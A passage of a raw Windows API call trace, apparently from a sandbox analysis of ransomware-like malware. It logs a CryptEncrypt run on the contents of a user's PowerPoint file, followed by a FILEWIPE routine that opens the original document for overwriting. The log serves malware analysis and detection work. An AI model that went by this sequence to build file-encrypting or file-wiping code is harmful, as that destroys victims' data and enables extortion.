hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.769] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.769] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.769] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.769] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.769] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.769] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.770] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.770] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.770] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.770] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.770] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.770] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.778] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.779] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x12a51, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12a60) returned 1 [0173.779] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.779] CharLowerBuffW (in: lpsz="byte[76385]", cchLength=0xb | out: lpsz="byte[76385]") returned 0xb [0173.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.781] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ea640*, pdwDataLen=0x87e820*=0x12a51, dwBufLen=0x12a60 | out: pbData=0x9ea640*, pdwDataLen=0x87e820*=0x12a60) returned 1 [0173.782] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.782] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.797] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.798] CryptDestroyKey (hKey=0x90aed8) returned 1 [0173.798] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.798] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.798] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.799] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.799] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.804] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 0x90af58 [0173.805] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.805] CharLowerBuffW (in: lpsz="byte[76369]", cchLength=0xb | out: lpsz="byte[76369]") returned 0xb [0173.806] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.806] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.806] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0173.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.807] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.807] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.807] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.807] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0173.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0173.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lvw qc5ro32oh.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa71a68 | out: hHeap=0x8a0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.810] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.811] 